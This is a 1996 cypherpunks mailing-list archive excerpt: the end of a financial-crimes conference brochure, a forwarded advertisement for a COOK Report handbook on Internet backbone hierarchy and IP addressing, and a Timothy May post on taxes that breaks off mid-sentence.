   An understanding of the _complex and subtle variances which exist in
   different countries and regions_.
   
   __Full Access to the Experts!__
   
   Our program has been designed to afford you interaction with our
   international faculty of experts, and to ensure you a full-range
   perspective on the latest issues surrounding Money Laundering, Asset
   Forfeiture and White Collar Crime.
   
   _Ask questions and probe the speakers further_ -- each panel will open
   up into a question and answer discussion -- learn from the leading
   decision makers!
   
   _Make sure that specific interests are addressed!_ Submit questions in
   advance to ensure coverage, your confidentiality is guaranteed.
   
   Join our _Open Forum_ discussions for a dynamic _exchange of ideas. _
   Make sure your position is heard!
   
MONEY LAUNDERING, CYBERPAYMENTS, FORFEITURE, THE GLOBAL MAFIAS, OFFSHORE
INVESTMENTS, SECURITIES, CORPORATE SECURITY AND INTERNATIONAL FINANCIAL CRIMES

  WEDNESDAY, MAY 15, 1996
  
   6:00-8:00 PM _PRE-CONFERENCE REGISTRATION, MARRIOTT MARQUIS IN NEW
   YORK CITY, NY_
   
  THURSDAY, MAY 16, 1996
  
   7:30 AM _REGISTRATION AND CONTINENTAL BREAKFAST_
   
   8:15 _WELCOMING REMARKS AND INTRODUCTION_
   
   Professor Fletcher N. Baldwin
   
   Robert M. Morgenthau
   
   The Hon. Jack B. Weinstein
   
   8:35 _CYBERPAYMENTS, SMART CARDS, DIGITAL CASH, CYBERBANKING AND
   ECONOMIC CRIME_
   
   _* The Electronic/Criminal Threat to Bankers, Business, and Securities
   Firms_
   
  * INVESTIGATIVE TECHNIQUES AND &QUOT;STING&QUOT; OPERATIONS
  
  * EMERGING PATTERNS OF MONEY LAUNDERING
  
  SPEAKERS:
  
   Dan Soto, Moderator
   
   Thomas Firnhaber
   
   Bob Kaimin
   
   Ezra C. Levine
   
   9:30 _COFFEE BREAK_
   
   9:45 _THE GLOBAL MAFIAS, MONEY LAUNDERING AND POLITICAL CORRUPTION_
   
  * STRATEGIC ALLIANCES BETWEEN THE MAFIAS
  
  * THE EASTERN EUROPE AND RUSSIAN MAFIAS
  
  * ASIAN ORGANIZED CRIME: THE TRIADS AND THE YAKUSA
  
   
   
   _*The Drug Cartels and Narco-States in Central and South America and
   Russia_
   
  * THE DECLINE OF NATION-STATES
  
  * POLITICAL INTEGRITY
  
   
   
   _Speakers_:
   
   Dr. Barry A. K. Rider, Moderator
   
   Ronald K. Noble
   
   Professor Fletcher N. Baldwin, Jr.
   
   10:45 _OFFSHORE DOMICILES AND TAX PLANNING_
   
  * INTERNATIONAL AND ESTATE TAX PLANNING
  
  * ASSET PROTECTION PLANNING
  
  * COMPARISON OF OFFSHORE DOMICILES
  
   
   
   _ __Speaker:_
   
   Walter H. Diamond
   
   David Neufeld
   
   12:00 _LUNCHEON_
   
   1:30 _KEYNOTE SPEAKER: RAYMOND W. KELLY; FORMER NEW YORK CITY POLICE
   COMMISSIONER, AND PRESIDENT, INVESTIGATIVE GROUP INTERNATIONAL, NY
   (INVITED) _
   
   2:15 _WHAT TO LOOK FOR IN A BSA AUDIT AND FEDERAL INVESTIGATIONS:
   OPERATIONAL DEFENSES FOR BANKERS, TRANSMITTERS, AND BUSINESSES_
   
  * KNOW YOUR CUSTOMER
  
  * THE NEW CURRENCY TRANSACTION REPORT
  
  * SUSPICIOUS ACTIVITY REPORT
  
  * EXEMPTIONS REQUIREMENTS: MANDATORY OR DISCRETIONARY
  
  * BSA EXAMINATION MANUAL
  
  * CMP DELEGATED AUTHORITY
  
  * BSA EXAMINATIONS: TEST DRIVEN; PROCEDURES REVIEW
  
  * UPDATE ON WIRE TRANSFERS REGULATIONS
  
  * STATE OF NEW YORK REVIEW
  
   
   
   _ __Speakers:_
   
   Susan Galli_, _Moderator
   
   Richard A. Small
   
   John Shockey
   
   3:30 _COFFEE BREAK_
   
   3:45 _CORPORATE AND BANK SECURITY, INTELLIGENCE AND
   COUNTER-INTELLIGENCE _
   
   _ __Speakers:_
   
   Dr. Barry A. K. Rider, Moderator
   
   Michael F. Zeldin
   
   4:30 _OPEN FORUM AND EXCHANGE OF IDEAS _
   
   5:15 _COCKTAIL RECEPTION (CASH BAR)_
   
  FRIDAY, MAY 17, 1996
  
   7:30 AM _CONTINENTAL BREAKFAST_
   
   8:00 _WORKSHOP FOR BANKERS AND MONEY TRANSMITTERS: REPORTING
   REQUIREMENTS, CTR FORM, CMIR FORM, FORM 8300, SUSPICIOUS ACTIVITY
   REPORT, WIRE TRANSFERS_
   
  SPEAKERS:
  
   Amy G. Rudnick
   
   Ezra C. Levine
   
   8:45 _A REGULATOR'S ROLE IN SUPERVISION OF BANKS AGAINST MONEY
   LAUNDERING _
   
  SPEAKER:
  
   William A. Ryback
   
   9:30 _NEW YORK - ORGANIZED AND ECONOMIC CRIME_
   
  SPEAKERS:
  
   Mary Jo White
   
   John Moscow
   
   James D. Herbert
   
   10:30 _COFFEE BREAK_
   
   10:45 _SECURITIES FRAUD, MONEY LAUNDERING, INSIDER DEALING AND MARKET
   MANIPULATION_
   
   _ __Speakers:_
   
   William McLucas
   
   G. Philip Rutledge
   
   Dr. Barry A. K. Rider
   
   10:45_ OPEN FORUM AND EXCHANGE OF IDEAS_
   
   12:00 _LUNCHEON_
   
   1:15 _KEYNOTE SPEAKER: STANLEY E. MORRIS, DIRECTOR, FINANCIAL CRIMES
   ENFORCEMENT NETWORK, U. S. TREASURY, WASHINGTON, DC_
   
   2:00_ STRATEGIES TO FIND AND RECOVER ASSETS WITH FOCUS ON INSURANCE
   AND BUSINESS FRAUD_
   
   _ __Speaker:_
   
   Dr. Barry A. K. Rider
   
   2:45_ COFFEE BREAK_
   
   3:00_ BANK SECRECY ACT: 1996 UPDATE_
   
  * 1995-1996 STATUTORY AND REGULATORY CHANGES
  
  * PROPOSED CHANGES IN 1996
  
   _ __Speakers:_
   
   Peter Djinis
   
   Dan Soto
   
   3:30 _UPDATE ON FOREIGN BANKING ISSUES_
   
  SPEAKER:
  
   William A. Ryback
   
   4:00 _THE FAIRNESS OF CIVIL FORFEITURE AND DOUBLE JEOPARDY ISSUES: A
   REVIEW OF RECENT AND UPCOMING U.S. SUPREME COURT DECISIONS ON
   FORFEITURE AND MONEY LAUNDERING_
   
  * DEGEN V. UNITED STATES, 95-173 (CERT. GRANTED, JAN. 12, 1996)
  
  * UNITED STATES V. URSERY, 95-345 (CERT. GRANTED, JAN. 12, 1996)
  
   _* United States v. $405,089.23/100, 95-346 (Cert. granted, Jan. 12,
   1996)_
   
  * BENNIS V. MICHIGAN, ARGUED NOVEMBER 29, 1995
  
  * LIBRETTI V. UNITED STATES, 64 U.S.L.W. 4005 (NOV. 7, 1995)
  
   _ __Speaker:_
   
   Professor Fletcher N. Baldwin, Jr.
   
   4:30 _OPEN FORUM AND EXCHANGE OF IDEAS_
   
  CLOSING REMARKS: PROFESSOR FLETCHER N. BALDWIN, JR.
  
   5:15 _ADJOURNMENT_
   
  DISTINGUISHED FACULTY
  
   _Professor Fletcher N. Baldwin, Jr._, Conference Chairperson,
   Professor of Law and Director of the Centre for International
   Financial Crimes Studies, College of Law, University of Florida,
   Gainesville, FL, Co-Author, Money Laundering, Asset Forfeiture and
   International Financial Crimes
   
   _Walter H. Diamond_, United Nations Tax Treaty and Free Trade Zone
   Advisor, Senior Vice- President, Offshore Institute, Editor,
   Economist, Author, International Tax Treaties of All Nations
   
   _Peter Djinis_, Director, Office of Regulatory and Enforcement, Law
   Enforcement, Under Secretary for Enforcement, Department of the
   Treasury, Washington, DC
   
   _Thomas Firnhaber_, Policy Advisor, Office of Financial Institutions
   Policy, FinCEN, U.S. Treasury, Washington, DC
   
   _Susan Galli_, Vice President, Citibank, N.A., New York, NY
   
   _James D. Herbert_, Chief, Organized Crime Strike Force Unit, U.S.
   Attorney's Office,Boston, MA
   
   _Bob Kaimin_, Senior Advisor, Federal Reserve System, Washington, DC
   
   _Raymond W. Kelly_, U.S. Treasury Under Secretary for Enforcement
   Nominee, Former New York City Police Commissioner, and President,
   Investigative Group International, New York, NY
   
   _Ezra C. Levine_, Attorney at Law, Howrey & Simon, Ad hoc Industry
   Group of Nonbank Money Transmitters, Washington, DC
   
   _William McLucas_, Director of Enforcement, Securities and Exchange
   Commission, Washington, DC
   
   _Robert M. Morgenthau_, District Attorney, New York, NY
   
   _Stanley Morris_, Director, Financial Crimes Enforcement Network, U.S.
   Treasury, Washington, DC
   
   _John Moscow_, Assistant District Attorney, County of New York, NY
   
   _Dr. Robert J. Munro_, Conference Co-Chairman and Program Coordinator,
   Co-Director of the Centre for International Financial Crimes Studies,
   College of Law, University of Florida, Gainesville, FL, Co-Author,
   Money Laundering, Asset Forfeiture and International Financial Crimes
   
   _David Neufeld_, Attorney at Law, Hill Wallach, Princeton, NJ
   
   _Dr. Barry A. K. Rider_, Director, Institute of Advanced Legal
   Studies, University of London Fellow of Jesus College, Cambridge
   University, England
   
   _Amy G. Rudnick_, Of Counsel, Gibson, Dunn & Crutcher, Washington, DC
   
   _G. Philip Rutledge_, Deputy Chief Counsel, Pennsylvania Securities
   Commission, Philadelphia, PA
   
   _William A. Ryback_, Associate Director for International Supervision,
   Federal Reserve Board of Governors, Washington, DC
   
   _John Shockey_, Special Assistant, Enforcement and Compliance
   Division, U.S. Office of the Comptroller of Currency, Washington, DC
   
   _Richard A. Small_, Special Counsel, Division of Banking, Supervision
   and Regulation, Board of Governors, Federal Reserve System,
   Washington, DC
   
   _Dan Soto_, Senior Special Examiner, Division of Banking, Supervision
   and Regulation, Board of Governors, Federal Reserve System,
   Washington, DC
   
   _The Hon. Jack B. Weinstein_, Senior Federal Judge of the Southern
   District of New York, NY
   
   _Mary Jo White_, U.S. Attorney, Southern District of New York, NY
   
   _Michael F. Zeldin_, Managing Director and General Counsel, Decision
   Strategies, Washington, DC and Former Chief, Money Laundering Section,
   Department of Justice, Washington, DC
   
                              CONFERENCE DETAILS
                                       
   _Marriott Marquis, New York, New York_ - A block of rooms has been
   reserved at a discounted nightly rate of $189. To register at the
   hotel please contact the reservations department at1-800-843-4898
   (local number is 212-398-1900) or fax to 212-704-8969, and mention the
   group name: &quot;Money Laundering/Oceana.&quot;. The New York
   Marriott Marquis is located at1535 Broadway, New York City, New York,
   10036.
   
   _Travel Discounts (Hotel, Airfare)_ - For travel discount information
   contact Chappaqua Travel at 1-800-666-5161 or 914-238-5151 or fax to
   914-238-5533. Please refer to the group name: &quot;Money
   Laundering/Oceana.&quot;
   
   _Tax Deduction of Expenses_ - An income tax deduction may be allowed
   for expenses of education (including travel, meals & lodging)
   undertaken to maintain and improve professional skills (see Treasury
   Ref. 1-162-5; Coughlin v. Commissioner, 203 F. 2d 307). Co-sponsor of
   the Conference is the Centre for International Financial Crimes
   Studies, Center for Government Responsibility, College of Law,
   University of Florida, Gainesville, Florida.
   
   _Continuing Education Credit: _ __Attorneys, Accountants, Bankers,
   Fraud Investigators__ - Continuing Legal Education Credits where
   applicable, are available upon request. For specific information about
   CLE or other professional accreditation, contact Robert Munro,
   University of Florida at 904-392-0417,_ prior_ to the conference.
   
   _Cancellations Policy_ - Refunds for registrations cancelled up to ten
   working days before the Conference will be reduced by a non-refundable
   administration fee of $125.
   
   _Program Confirmation_ - Written confirmation of your registration
   will be sent to you upon receipt. Please bring it with you to the
   Conference as proof of registration. If you do not receive the
   confirmation notice prior to the Conference, please call Oceana at
   (914) 693-8100 at least 48 hours in advance to confirm that your
   registration was received.
   
   _Conference Course Materials _- Course materials, developed and
   prepared by the Conference Faculty Sponsors, are included with the
   price of registration.
   
   _Payment_ - Registration Fees are payable by CREDIT CARD (American
   Express/Mastercard/Visa), CHECK (Payable to Oceana Publications, Inc.,
   payable in U.S. dollars and drawn on a bank physically located in the
   U.S.), or by WIRE TRANSFER_ _(add $25 to the registration fees for
   banking processing charges and make payment to Bank of New York, 138
   Mamaroneck Ave., White Plains, NY 10601 USA; Account # 670-9198651;
   Bank of New York ABA # 021000018.) Registration fees do not include
   transportation or hotel accommodations. Conference fees do include
   scheduled breakfasts, coffee breaks and luncheons as well as course
   materials.
   
  DON'T MISS OUT ON THIS INCREDIBLE OPPORTUNITY.
  
  REGISTER NOW -- SEATING IS LIMITED!
  
                 CALL OCEANA'S INTERNATIONAL SEMINARS DIVISION
                                       
   _toll free at 1-800-831-0758 or 1-914-693-8100 (outside the U.S.) for
   more information._




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 5 May 1996 14:29:43 +0800
To: cypherpunks@toad.com
Subject: Tracking Internet Infrastructure
Message-ID: <01I4BK6JR82Y8Y53GG@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"rre@weber.ucsd.edu" 14-APR-1996 07:00:37.86
From: Phil Agre <pagre@weber.ucsd.edu>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Fri, 12 Apr 1996 22:35:54 -0400 (EDT)
From: Gordon Cook <gcook@tigger.jvnc.net>


Tracking Internet Infrastructure:
A Handbook on Business, Technology & Structural Issues Reshaping the 
Landscape of the Commercial Internet 

An Anthology of Recent Articles  from The COOK Report


The Internet has undergone huge changes in the year since the NSFnet 
backbone service was turned off.  It has become a much larger, more 
stratified, and more expensive entity within which to operate.  Since 
last September we have published a series of articles examining these 
changes in depth.  We have concluded that it might be useful to gather 
them together into a single volume which is titled Tracking Internet 
Infrastructure: an organized, indexed Handbook on Internet Infrastructure 
Issues.

This Handbook covers the following critical range of issues:

* interviews with key industry players about viable Internet business 
models, 

* the hierarchical organization of ISPs through CIDR and routing 
pressures, 

* to the viability of the NAPS; 

* to renumbering and ownership of IP addresses; 

* to strains on backbone routers and backbone network redesign with 
switched cores; 

* to industry views on quality of service issues; to issues of 
settlements and route charging; 

* to issues of bandwidth availability in network design; and to ATM as 
technology savior or dinosaur.  

The rest of this message contains:  (1) Our introduction to the Handbook
				(2)  The Handbook table of contents
				(3)  Description of the Handbook's audience
				(4)  Price and ordering information

1.  Introduction

A Summary of the 
Operational 
Environment 

Power Consolidates at the Top of a 
Hierarchical Internet

Less than three years ago, at about one twentieth its current size, the 
topology of the Internet was relatively flat.  Service providers could 
attach to each other via the NSFnet backbone or CIX router and, for the 
most part, they could consider themselves plugged directly into the 
Internet with no one up stream of them.  This meant that no one was in a 
position to dictate to them a multiplicity of rules, regulations and 
costs as part of providing Internet service.

One paid the leased line costs for one's own backbone and, in the case of 
research and education, was connected to the NSFnet backbone for free.  
The R&E networks paid ANS a transit fee for their commercial customers.  
If the service provider were commercial, it joined the Commercial 
Internet Exchange and interconnected at the CIX router for the princely 
sum of $45,000 a year ($10,000 membership fee, $5,000 port fee and about 
$20,000 for T-1 line to the CIX.  Or one was a downstream customer of 
Sprint and relied on Sprint to deliver one's packets to the CIX router 
without having to pay the CIX membership fee.  

Over the period of about a year Sprint, by allowing ISPs to resell 
connectivity, and by giving all ISPs downstream of it connectivity to the 
rest of the Internet Universe, created a situation where customers of 
Sprint received most of the benefits given those ISPs that connected 
directly to the CIX router.  Some ISPs were shocked in mid summer of 1994 
when the CIX proposed that those packets of SprintUs resellers who didn't 
pay the CIX fee would be blocked.

Since then, as the Internet has grown by more than an order of magnitude 
in size, the importance of the NSFnet and CIX interconnects has either 
disappeared or faded.  A very hierarchical Internet has emerged.  One can 
have several levels of upstream service providers.  Such service 
provision ends at a traffic exchange point known either as a NAP or a 
MAE.  Address space in the form of IP numbers is no longer handed out the 
interNIC to all ISPs.  

To get address space direct from the interNIC, you have to do one of two 
things: (1) show that you have no one up stream.  The only way to do that 
is to directly connect to a NAP or MAE and preferably to more than one.  
This level of the hierarchy is reached by perhaps 40 of about 2,400 ISPs 
nation wide.  Or (2) an ISP can multi-home (take a connection from two 
different backbone providers).  Perhaps four to five hundred ISPs are 
multi-homed.  But even a multi-homed ISP is unlikely to get interNIC 
address space, unless it can demonstrate a rapid rate of growth.

Connecting at a NAP or MAE, in an effort to put one's own operating 
environment under one's direct control, is very expensive.  Unlike the 
$45,000 CIX fee the minimum annual cost is $100,000 and up.  Once there, 
providers have to pay additional sums of money to those still higher in 
the hierarchy to see that their packets are delivered.  These sums of 
money are known as transit fees.  Multi-homing is obviously much less 
expensive.

But even at traffic exchange points (NAPs or MAEs) there are additional 
hierarchies.  Some find others who will peer with them.  That is to say, 
they will engage in cost-free transit for a certain percentage of those 
attached.  Those at the peak of the hierarchy are the six service 
providers who are believed to engage in cost free peering and transit 
with each other - MCI, SPRINT, UUNET, ANS, PSI and AGIS.  These six 
operate the default free core of the American Internet.  Exchange of 
routing information among them is supposed to be complete, so that none 
need say: if your routers don't have address XYZ, send packets by default 
to the next large central player, in the hope that his routers will 
know.  Virtually everyone else is, in one sense or another, a customer of 
these top six.  BBN is a special case.  MCI carries all of BBN's routes.  
Consequently in this sense  BBN which is as large as UUNET and certainly 
much larger than AGIS, is a customer of MCI.  We expect this to change by 
year's end when AT&T fully deploys the network for its partnership with 
BBN.  [Editor's Note:  when we fact checked this assertion with sources 
at BBN we were told that BBN is putting its own national T-3 backbone in 
place, that significant parts are now operational, that it is at MAE 
East, MAE West and the Sprint NAP, that it peers with PSI, UUNET, ANS and 
others, and that its transit relationship with MCI is to reach MCI 
customers and any Internet sites not directly reachable via its peers.]

Those who are able to buy transit at a NAP gain by this action gain  the 
ability to ensure it to their downstream (ISP) customers.  In other words 
transit rights are generally resellable.  In this sense, those who 
purchase transit at the NAPs or MAEs are as fully connected to the core 
Internet as the big six - with one critical exception.  They are renting 
their core connectivity for a hefty monthly price and without the 
protection of a long term lease.  Readers however should avoid 
generalizations.  Transit agreements are very private, never talked about 
openly and vary widely on a case-by-case basis.

IP Numbers and Other Indicators of Hierarchy

Another way of describing the top of the hierarchy is to point out that 
all six get their IP numbers directly from the interNIC and hand out 
numbers lower on down in the IP hierarchy to those connected to them.  
But this hierarchy is not uniformly rigid.  The rule of thumb of your 
upstream provider as a source of IP numbers has some notable exceptions.  
For example: of the remaining approximately 35 providers which are 
directly connected to one or more of the major NAPs or MAEs, most get 
some of their IP numbers direct from the interNIC while others are 
derived from being attached at some point or in some way to one or more 
of the central seven.  Finally, as we indicated above, the several 
hundred ISPs who are multi-homed also get their numbers from the 
interNIC, as may ISPs who can demonstrate extremely rapid downstream growth.

An ISP without IP addresses is worthless, since the only thing making it 
possible to connect an individual to the Internet is the IP number that 
tells others how to find him.  The hierarchy of the Internet is now such 
that about 80% of service providers must get their addresses directly 
from their backbone vendors who are often also their competitors.  These 
address blocks are referred to as CIDR blocks.  We have recently written 
extensively about them. 

Until the fall of 1995 large ISPs were able to connect to one or two NAPs 
and sometimes negotiate cost free peering.  As an option they could then 
buy transit to the other five from one of the big six.  During the past 
90 days this has changed.  Reports reaching us indicate that cost free 
peering is available only to those connecting at T-3 speed to three or 
more NAPS a task that will cost an ISP well over $300,000 a year.  But 
even those who do this will find that there is nothing that will force 
everyone at each NAP to which they connect to peer with them.  If one or 
more of the majors refuses to peer with a newcomer, that newcomer will 
have to buy transit to that major from one of those with which it peers 
or be in the awkward position of being unable to reach a significant part 
of the Internet.

For most of 1995 an ISP connecting to a NAP could by transit for $5 to 15 
thousand dollars a month from one of the seven.  But reports reaching us 
now indicate that the six have effectively eliminated the purchase of 
transit from them as an option for domestic ISPs.  These developments 
effectively shut off connection to a major NAP as a means for an ISP to 
operate from the top of the Internet hierarchy.  The only ISPs that may 
even attempt to do so now are those with upwards of $500,000 a year to 
spend on the adventure.  In the meantime the NAPs themselves are 
developing a hierarchy.  MAEs either are opening or have opened in Los 
Angeles, Texas, Chicago and New York.  Without the presence of at least 
the big six at these NAPs, all they are good for is exchanging local 
traffic among local ISPs and keeping loads on long haul backbones down.

The Issue of IP 
Portability

When a customer changes phone service from AT&T to MCI, or visa versa, 
that customer does not have to change phone numbers.  Although the 
portability of  IP address assignments from CIDR blocks has been 
discouraged it has never been prohibited.  But last month a new internet 
draft (draft-ietf-cidrd-addr-ownership-07.txt) by Yakov Rekhter and Tony 
Li of Cisco was published.  This draft created much debate in mid 
February when it was put forth by the CIDRD Working Group for elevation 
to best current practice.  Such elevation would put IETF approval behind 
the practice of a service provider insisting on the return of address 
space when a customer left.  If such a customer were to go to a different 
service provider for a new connection, every one attached to that 
customer's network would be forced to renumber their own networks.  For a 
network of any size renumbering would be expensive and, if that network 
were involved in anything approaching a mission critical application, 
would become unthinkable.

This would very likely mean that any customers buying leased lines to 
connect a network larger than a few dozen hosts in size will find 
themselves well-advised to purchase only from an ISP directly attached to 
one or more of the MAEs/NAPs -- and, therefore, in direct control of its 
address space.  Furthermore, the safest and most conservative action with 
be to connect to the six providers who are part of the default free 
backbone.  Certainly we suspect that the auto industry would tell its 
suppliers not to connect outside the direct NAP connected top tier.

While there are technical reasons for this policy (fear of the collapse 
of internet routing if it is not carried out), it is ironic that such 
policy would greatly accelerate the Internet's stratification into a 
business service and a consumer service, for those who are there to 
explore, just for the fun of it.  There is also an anti-competitive 
aspect to implementing such policy, in that large organization customers, 
which embed non-transferable IP addresses into their network hosts are 
really locking themselves to a single provider.  Should a provider's 
service becomes "less than optimal," we are sure that providers are aware 
that the cost associated with renumbering in order to change vendors, 
limits their customer's options.  While network address translation 
devices (NATs) do exist and will give some customers an alternative, they 
are by no means regarded as a perfect answer to these difficult problems. 

It is beginning to appear that, the more the Internet increases in size, 
the faster that power flows upwards into the hands of a few who, since 
they are both operators and rule makers for the commercial Internet, 
would find themselves singled out for accusations of blatant conflict of 
interest in most other situations.  Under these conditions where the fox 
is essentially in charge of the hen house.  Given the nature of a large 
portion of the customer base (ie large industry and educational 
networks), we wonder how long customers will suffer these burdens without 
demanding regulatory relief.

2.  Contents:  
	Tracking Internet Infrastructure:

	Editor's Introduction
	A Summary of the Operational Environment 		p.  1 

Part One: Internet Business Models
	Some Large Providers Seek Forum to Push for Internet 
	Service Model Change	(Sept.  95)			p.  8

	Interview with Vint Cerf:  Discussion Needed of Benefits 
	Derived from Backbone Resources (Sept.95)		p.  12

	PSI Satisfied with Cooperative Best Effort Internet Business 
	Model  Interview with Bill Schrader(Oct.  95)		p.  17

	Thoughts on Internet Business Models  by Sean Doran   (Oct.  95)
								p.  20

	Zero Sum Internet Business Models Vie with Internet 
	Cooperative Culture	(Oct.  95)			p.  24

	Routing Arbiter & Charging for Routing Announcements: Potential
 	Operational and Financial Impacts Assessed  (Jan. 96)	p.  33

Part Two:  Internet Architecture Change & Network Stratification

	Evolution in CIDR Rules In 1995 Makes Most IP Numbers non
 	Transportable	(Sept.  95)				p.  43

	Constraints of Growth: Provider Based CIDR Likely to Impede 
	Smaller Players   Interview with Dave Crocker and Noel
	Chiappa	(Nov.  95)					p.  46

	Pace of Internet Stratification Increases -- IETF Internet Draft
 	Suggests That Customer Network Renumbering Be Accepted As 
	"Best Current Practice" (Mar.  96)			p.  54

Part Three:  Backbone Routing Versus Switching

	Continued Exponential Growth Stresses Internet Backbone Routing
 	Infrastructure	(Dec.  95)				p.  62

Part Four: Institutions - Sprint; IETF, ISOC, and  the NAPs 

	SprintLink Experiencing Employee Attrition - Executives Slow to
	Provide Staffing Resources Needed for Continued Major Growth 
	(Sept.  95)						p.  81

	National Science Foundation Domain Name Charges Financial
 	Implications for Network Solutions NSF Rationale Behind Actions
	Interview with Don Mitchell	(Oct.  95)		p.  85

	Internet Society:  Role of Charter Members a Contentious Issue
	(Nov.  95)						p.  87

	Transition Pains at the Internet Society (Feb.  96)	p.  88

	Interview with Paul Mockapetris Who Considers Future of IETF &
 	Finds Software Patents a Growing Obstacle (Jan.  96) 	p.  89

	Interview with Tony Rutkowski Who Finds Internet International
 	Coordinating Group Desirable	(Mar.  96)		p.  93

	No Room at Sprint's Pennsauken NAP  (Jan.  96)		p.  96

Part Five:  Quality of Service

	Automotive Industry Will Seek Internet Service Provider
	Certification  (Feb.  96)			p.  102

	Steve Wolff Sees Convergence Between Internet and Telephony
	(Feb.  96)					p.  107

Part Six: ATM and the Technology of Bandwidth on Demand

	Can Bandwidth Supply Keep Pace With Demand? ATM to the Rescue?  
	An Introduction to a Series of Articles on Role of ATM in the Internet
 	(Mar.  96) 					p.  111

	ATM: Grand Unifying Technology or  Brain-Damaged Transport
 	Product?  (April 96)				p.  114

	Bandwidth & Resource Reservation as Factors in Ones Network
 	Provisioning Philosophy -- Can Bandwidth Ever Be Too Cheap to
 	Meter?	(April 96)				p.  117

	Interview with Bellcore's Dave Sincoskie Who Discusses the Internet
 	Future of ATM & Outlines BellcoreUs Interest in Building Network of
 	Interconnected ATM  NAPs	(March 96) 	p.  120

	InternetMCI Bets its Future on ATM  Data Services Marketing & Data
	Services Engineering Vice Presidents Explain MCI Strategy. 
	Interview with Stephen von Rump and Steve Tabaska
	(April 96)					p.  124

	Interview with BBN's John Curran:  Has the Internet Derailed ATM?
	(May 96)					p.  132

Index							p.  140

3.  The Audience for the Handbook

Within the national Internet service provider community, Tracking 
Internet Infrastructure is intended to educate strategists with the 
complexities facing their engineering and operations staff.  Among 
smaller ISPs it should serve as a tool to bring owner-operators, who are 
busy 18 hours a day ordering lines, installing them and servicing their 
customers, up to speed on the changes going on in the environment in 
which they must operate.  LECs and other phone companies will find it 
useful.  Finally familiarity with the issues discussed within the 
Handbook will provide corporate MIS people with a valuable knowledge base 
from which to negotiate with their present or future internet service 
providers.

However, since these infrastructure issues are also critical to the 
continued growth and success of the industry, this Handbook is expected 
to be a tool for use by those in the banking and investment community.  
If those in the financial community understand the changing technical and 
power relationships in the industry, they will be able to improve the 
quality of their investment decision making.  It should also be useful to 
corporate strategic planners who will be advising their companies' 
decision making in vertical industry applications.

4.  This handbook may be purchased in several ways:

A.  Single Copy GBC Bound, double sided xeroxed. $275.00

B.  Site license:  Set of single sided original 600 dpi laser written 
pages suitable for purchasing organization to reproduce as many copies as 
it wishes for its employees only.  $750

C.  A current subscriber without a site license may upgrade to a site 
license and pay an additional price of $275 to receive the report with 
full site license privileges.

D.  A current subscriber with a $650 site license or higher may purchase 
the report with full site license privileges for $275.

To order contact Gordon Cook by phone (609) 882-2572 or email:  
cook@cookreport.com.

*********************************************************************
Gordon Cook, Editor & Publisher    Subscriptions: Individ-ascii   $85
The COOK Report on Internet                 Individ. hard copy   $150
431 Greenway Ave, Ewing, NJ 08618 USA       Small Corp & Gov't   $200
(609) 882-2572                              Corporate            $350
Internet: cook@cookreport.com               Corporate Site Lic.  $650
http://pobox.com/cook/  for new COOK Report Glossary of Internet terms 
*********************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 5 May 1996 15:28:08 +0800
To: cypherpunks@toad.com
Subject: Why I Pay Too Much in Taxes
Message-ID: <adb163b00102100471cc@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:24 PM 5/4/96, Black Unicorn wrote:

>An organization that is efficent at enforcing a immensely complex set of
>regulations incomprehensible to joe sixpack is not a good thing.


As if anybody didn't already know, the tax code is incomprehensible to more
than just "Joe Sixpack." I find it imcomprehensible, with "carryback
callback offshore allowances" and "alternative minimum taxes" and all that
garbage.

I started using "Macintax" many years ago, then decided to wing it manually
for many years, but have recently gone back to the Intuit product (called
Macintax, but a cross with TurboTax).

I answer a bunch of questions it asks me, making educated guesses where I
don't understand something, and then I do the process a _second_ time,
usually with different results. I use the lower tax bill of the two and
send that instance in. Sometimes the IRS and its partners (the Franchise
Tax Board, where California taxes are approaching what Federal rates for
most people were a scant decade or two ago) tells me I underpaid and must
send in additional taxes, penalties, interest charges, etc. (They won't
prosecute for such minor things, so long as the money is paid and there was
no gross hiding of income.)

I am gradually losing all track of what is going on, and I suspect I'm not
alone (my friends who use tax preparers, human ones, report the same
situation).

It seems to me that Jordan was referring to the compliance rate and the
cost of the overhead, not considering the overall tax burden. (Italy is a
fascinating example. The country appears to be moderately poor, based on
tax receipts, but spending is quite high...it is clear that a large
fraction of Italy's overall income is unreported.)

Not wanting to join in this bashing of taxes--my views are clear, as
evidenced in the title of this thread--but I have to point out that I paid
approximately 60% of everything I made last year to the tax collectors!
This counts the Federal income tax (about 32%), the California income tax
(about 11%), the "self-employment tax" (FICA) for some consulting I did
(15%), property tax on my old residence ($2200), property tax on my new
residence ($4200), sales tax on purchases (8.25%), gasoline taxes (about
30-40 cents per gallon), a special tax on my Ford Explorer ($300), and
probably some miscellaneous other taxes I have neglected.

And of course the corporations that pay me dividends and whose stock price
shows gains have _already_ paid roughly 45% or so in taxes, depending on
how clever they were at allocating costs to minimize taxes. This is the
famous "double taxation" of corporate earnings one hears about. Intel, for
example, pays 45% of its considerable income in taxes, sends some of the
remaining profits to me in the form of capital gains and dividends, and I
then pay another 40% or so in income taxes on this share. The math is
pretty simple...there ain't much left over. (The much-derided Laffer Curve
is actually quite important here...when overall tax rates get high enough,
people choose to do less work. Some of us even retire early.)

Considering that a growing fraction of the population is not working at
all, and is living on "entitlements" that they essentially get from me, and
considering that the American Revolution was at least partly in response to
the perception that taxes collected by King George were a bit too high (at
a _tiny fraction_ of the amount I cited above), the resentment many of us
feel is understandable.

One area where I mostly agree with Jordan Hayes and disagree with Sandy,
Uni, and Duncan, is that I don't think it's as easy as they sometimes claim
it is to avoid taxes by the offshore stratagems they espouse. Believe me, I
looked into this a while back (it is never illegal to investigate ways to
minimize tax burdens), and even considered moving out of the U.S. to a tax
